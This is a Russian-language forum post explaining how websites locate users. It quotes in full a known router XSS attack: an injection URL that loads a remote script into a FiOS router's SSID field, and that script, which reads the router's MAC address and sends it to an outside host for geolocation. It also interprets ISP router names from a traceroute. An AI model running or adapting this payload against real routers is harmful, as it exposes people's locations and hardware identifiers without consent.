Сергей-4030> Сумлеваюсь я чо то. Скорее я поверю, что гуглемобиль когда ездит, собирает информацию о встреченных wi-fi-ях. А когда информации по вай-фаю не найдено (тока купленный), то тогда смотрит по IP. Получается грубее, конечно.
Тут совокупность. У Браба в первом посте ссылочка на сайт с объяснениями...
Первое XSS injection с Ajax — почему с Ajax — это просто такой объект в JavaScripte, который позволяет организовавыть сессию (и с довольно высоким уровнем — можно на уровне HTTP, можно на уровне XML, можно свой протокол) в невидимом режиме. Я в PNC банке так данные передавал в LendingTree, местные вещи, в том числе для всяких DealerTrack и RouteOne. Более того, Amazon продаёт банкам инфу, где привязан настоящий платёжный адрес к IP адресу. Далее, суть состоит в том, что сайт посылает тебе HTML с JavaScript Code в котором стоит этот скрипт. Потом это скрипт коммуникирует с раутером, поставляя ему в URL ещё один JavaScript — у Сэма есть такая ссылочка:
code text
http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E
Заметь на строчки между словечками script. Сам скрипт выглядит так:
code text
var xmlhttp = new XMLHttpRequest();
xmlhttp.open('GET', '/index.cgi?active%5fpage=9124&req%5fmode=0&mimic%5fbutton%5ffield=goto%3a+9124%2e%2e&button%5fvalue=9124', true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
{
var mac = xmlhttp.responseText.substr(xmlhttp.responseText.indexOf('00:21:63'), 17);
mac = mac.replace(/:/g, '-');
document.location = 'http://samy.pl/mapxss/fiosmap.php?mac=' + mac;
}
}
xmlhttp.send();
Такой простенький Ajax c XMLHttpRequest объектом — основой Ajax-а. И этот скрипт уже инжектет внутрь сервера на раутере, если он XSS vulnerable, в этот момент уже пофиг, если раутер спрашивает пароль. Скрипту это уже не надо. Скрипт получает MAC Address. А потом в дело вступает Гугль.
У Гугля есть те самые автомобили, которые ты упомнул. Плюс гугль использует базу от хаккеров, которые выполнили mapping WiFi на адреса. По США почти полные карты доступны. Очень много сделано по Европе, России, Китаю и Австралии. Но не всё. Такие базы можно найти на разных сайтах.
Mapping Wireless Routers
Кроме того, у Гугла стоят разные точки во многих местах с известным адресом. Ну и пользуются они открытыми, вроде, тоже. Хотя тут я на 100 процентов не уверен. Далее, как уже давал ссылку Kernel3 — с разных открытых точек можно померить силу сигнала. Ну и с андроидов можно снимать силу сигнала и MAC адреса доступных WiFi, которые кладутся в БД. Всё. Никакой фантастики, только методичный сбор инфы и её обработка. Да у имена у многих провов больших у промежуточных раутеров соотвествтующие. Например:
code text
C:\>tracert www.google.com
Tracing route to www.l.google.com [72.14.204.103]
over a maximum of 30 hops:
1 1 ms <1 ms <1 ms Wireless_Broadband_Router.home [192.168.1.1]
2 24 ms 4 ms 4 ms L100.PITBPA-VFTTP-34.verizon-gni.net [173.75.30.1]
3 13 ms 4 ms 4 ms G1-0-7-334.PITBPA-LCR-03.verizon-gni.net [130.81.140.106]
4 12 ms 11 ms 12 ms so-15-3-0-0.LCC1-RES-BB-RTR1-RE1.verizon-gni.net [130.81.28.204]
5 17 ms 17 ms 24 ms 0.so-3-2-0.XT1.DCA6.ALTER.NET [152.63.39.169]
6 27 ms 14 ms 14 ms 0.xe-7-0-2.XL3.IAD8.ALTER.NET [152.63.32.230]
7 15 ms 14 ms 24 ms TenGigE0-6-1-0.GW7.IAD8.ALTER.NET [152.63.32.194]
8 67 ms 47 ms 49 ms google-gw.customer.alter.net [152.179.50.106]
9 19 ms 14 ms 14 ms 216.239.46.248
10 184 ms 23 ms 24 ms 66.249.94.46
11 15 ms 17 ms 14 ms iad04s01-in-f103.1e100.net [72.14.204.103]
Trace complete.
C:\>
Точки 2 и 3 тебе ничего не напоминают?
PITBPA — Pittsburgh, Bethel Park.
VFTTP указывает на конкретный район, который обслуживается конкретным концентратором. В точке 4 RES обозначает Residential. Бизнес ребята имеют другое расширение. Данные я собрал, работая напрямую с routing group, которой помогал выгрести ошибки. Так сказать, social engineering.